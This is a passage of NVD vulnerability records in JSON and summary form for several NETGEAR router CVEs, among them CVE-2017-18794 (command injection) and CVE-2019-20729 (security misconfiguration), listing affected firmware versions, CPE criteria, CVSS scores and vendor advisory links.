"url": "https://kb.netgear.com/000062710/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Range-Extenders-PSV-2018-0379"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-21 19:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by command injection. This affects R6300v2 before 1.0.4.8_10.0.77, R6400 before 1.0.1.24, R6700 before 1.0.1.26, R7000 before 1.0.9.10, R7100LG before 1.0.0.32, R7900 before 1.0.1.18, R8000 before 1.0.3.54, R8500 before 1.0.2.100, and D6100 before 1.0.0.50_0.0.50.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | d6100_firmware | * | |
| netgear | d6100 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "61FD5738-E14A-4CD2-A750-E75AFFE31119",
"versionEndExcluding": "1.0.4.8_10.0.77",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "29EA60BF-FBA6-4305-8173-07130A527410",
"versionEndExcluding": "1.0.1.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DC332E60-A7DB-41C5-B1ED-FE3EDF83F8BC",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD7D570E-C5EF-4D3E-BCCF-926DBDB12016",
"versionEndExcluding": "1.0.9.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "833A98AF-A4B0-4C68-AACD-6B3F58E64060",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A98DFA81-D1BA-41AE-A6A3-1EBBFC452D0F",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BE5F241-45D7-42A2-B5EA-3869B1C97098",
"versionEndExcluding": "1.0.3.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CEE4B878-05AB-4B45-BCA4-28795AA454F9",
"versionEndExcluding": "1.0.2.100",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "372D9D60-D9CB-4945-8B0B-760EBED9377C",
"versionEndExcluding": "1.0.0.50_0.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection. This affects R6300v2 before 1.0.4.8_10.0.77, R6400 before 1.0.1.24, R6700 before 1.0.1.26, R7000 before 1.0.9.10, R7100LG before 1.0.0.32, R7900 before 1.0.1.18, R8000 before 1.0.3.54, R8500 before 1.0.2.100, and D6100 before 1.0.0.50_0.0.50."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una inyecci\u00f3n de comando. Esto afecta a R6300v2 versiones anteriores a la versi\u00f3n 1.0.4.8_10.0.77, R6400 versiones anteriores a la versi\u00f3n 1.0.1.24, R6700 versiones anteriores a 1.0.1.26, R7000 versiones anteriores a 1.0.9.10, R7100LG versiones anteriores a 1.0.0.32, R7900 versiones anteriores a 1.0.1.18, R8000 versiones anteriores a 1.0.3.54, R8500 versiones anteriores a 1.0.2.100, y D6100 versiones anteriores a 1.0.0.50_0.0.50."
}
],
"id": "CVE-2017-18794",
"lastModified": "2024-11-21T03:20:56.440",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.5,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.5,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-21T19:15:12.097",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049368/Security-Advisory-for-Command-Injection-Vulnerability-on-D6100-and-Some-Routers-PSV-2017-0321"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049368/Security-Advisory-for-Command-Injection-Vulnerability-on-D6100-and-Some-Routers-PSV-2017-0321"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-74"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 20:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects JNDR3000 before 1.0.0.22, R6250 before 1.0.4.26, R6300v2 before 1.0.4.22, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.28, R6900P before 1.3.1.26, R7000P before 1.3.1.26, R7300DST before 1.0.0.62, R7900 before 1.0.2.16, R8000 before 1.0.4.18, R7900P before 1.4.1.42, R8000P before 1.4.1.42, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WNDR3400v3 before 1.0.1.18, WNDR4500v2 before 1.0.0.68, and WNR3500Lv2 before 1.2.0.48.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | jndr3000_firmware | * | |
| netgear | jndr3000 | - | |
| netgear | r6250_firmware | * | |
| netgear | r6250 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r6900p_firmware | * | |
| netgear | r6900p | - | |
| netgear | r7000p_firmware | * | |
| netgear | r7000p | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r7900p_firmware | * | |
| netgear | r7900p | - | |
| netgear | r8000p_firmware | * | |
| netgear | r8000p | - | |
| netgear | r8300_firmware | * | |
| netgear | r8300 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | wndr3400_firmware | * | |
| netgear | wndr3400 | v3 | |
| netgear | wndr4500_firmware | * | |
| netgear | wndr4500 | v2 | |
| netgear | wnr3500l_firmware | * | |
| netgear | wnr3500l | v2 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jndr3000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ACE7B01B-A02D-4B45-B61C-D61D8CFD52C1",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jndr3000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DEEEEE5-0798-450E-BF9D-B17A15235C80",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D1A9B6F-89B2-4785-A0E2-3FD322D6A28F",
"versionEndExcluding": "1.0.4.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FF768B9B-5C16-494F-95E7-F938798A4C5E",
"versionEndExcluding": "1.0.4.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB86B739-440E-4269-92EC-F7F3058E4406",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4EAD37-164F-4631-8DED-AB9BD41D2429",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B0BCDB34-EC1F-43A1-AA7D-BF4CA1F4C168",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A71BAC6A-F08E-4015-9A54-3CF5FDF85950",
"versionEndExcluding": "1.0.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "577AD463-2E99-4D07-BF12-1D40AC88B3FC",
"versionEndExcluding": "1.0.9.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "03D83FC0-511A-4DEC-9188-962F70495FFF",
"versionEndExcluding": "1.3.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6912DF29-6041-4450-8ED8-4AB74EBDB0D7",
"versionEndExcluding": "1.3.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "999A4F9A-D803-47D0-94F5-4626669D8DE0",
"versionEndExcluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "471E4F42-7114-4A7F-832D-2E9222BD25B4",
"versionEndExcluding": "1.0.2.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6C5FC237-F74C-4771-B5D3-36CF245C0396",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "337E0627-1D8C-4AC8-BF42-7B095FF22B4F",
"versionEndExcluding": "1.4.1.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E1086EA-9B13-4F1D-B483-6AACC9E5E724",
"versionEndExcluding": "1.4.1.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7E4D2E75-1ADA-4ECE-B1B5-12E28913063E",
"versionEndExcluding": "1.0.2.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16C3369B-3E65-4CB7-BFF0-5052DBB16C45",
"versionEndExcluding": "1.0.2.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38BC0F78-4571-45E6-9023-CD1AEA7DF8EF",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "19595646-15D5-4558-99C9-B562EBC8E71A",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "AB00ECAD-7474-4D85-8248-D014E5808814",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "263DFC40-2EED-49F3-AAA5-0F5D7EAC2DF3",
"versionEndExcluding": "1.2.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects JNDR3000 before 1.0.0.22, R6250 before 1.0.4.26, R6300v2 before 1.0.4.22, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.28, R6900P before 1.3.1.26, R7000P before 1.3.1.26, R7300DST before 1.0.0.62, R7900 before 1.0.2.16, R8000 before 1.0.4.18, R7900P before 1.4.1.42, R8000P before 1.4.1.42, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WNDR3400v3 before 1.0.1.18, WNDR4500v2 before 1.0.0.68, and WNR3500Lv2 before 1.2.0.48."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una configuraci\u00f3n incorrecta de los ajustes de seguridad. Esto afecta a JNDR3000 versiones anteriores a 1.0.0.22, R6250 versiones anteriores a 1.0.4.26, R6300v2 versiones anteriores a 1.0.4.22, R6400 versiones anteriores a 1.0.1.36, R6400v2 versiones anteriores a 1.0.2.52, R6700 versiones anteriores a 1.0.1.44, R6900 versiones anteriores a 1.0.1.44, R7000 versiones anteriores a 1.0.9.28, R6900P versiones anteriores a 1.3.1.26, R7000P versiones anteriores a 1.3.1. 26, R7300DST versiones anteriores a 1.0.0.62, R7900 versiones anteriores a 1.0.2.16, R8000 versiones anteriores a 1.0.4.18, R7900P versiones anteriores a 1.4.1.42, R8000P versiones anteriores a 1.4.1. 42, R8300 versiones anteriores a 1.0.2.116, R8500 versiones anteriores a 1.0.2.116, WNDR3400v3 versiones anteriores a 1.0.1.18, WNDR4500v2 versiones anteriores a 1.0.0.68, y WNR3500Lv2 versiones anteriores a 1.2.0.48."
}
],
"id": "CVE-2019-20729",
"lastModified": "2024-11-21T04:39:12.277",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L",
"version": "3.0"
},
"exploitabilityScore": 1.5,
"impactScore": 6.0,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T20:15:13.273",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061198/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-3120"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061198/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-3120"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-23 16:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects R6250 before 1.0.4.8, R6300v2 before 1.0.4.8, R6700 before 1.0.1.20, R7000 before 1.0.7.10, R7000P before 1.0.0.58, R6900P before 1.0.0.58, R7100LG before 1.0.0.32, R7900 before 1.0.1.14, R8000 before 1.0.3.22, and R8500 before 1.0.2.94.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6250_firmware | * | |
| netgear | r6250 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7000p_firmware | * | |
| netgear | r7000p | - | |
| netgear | r6900p_firmware | * | |
| netgear | r6900p | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
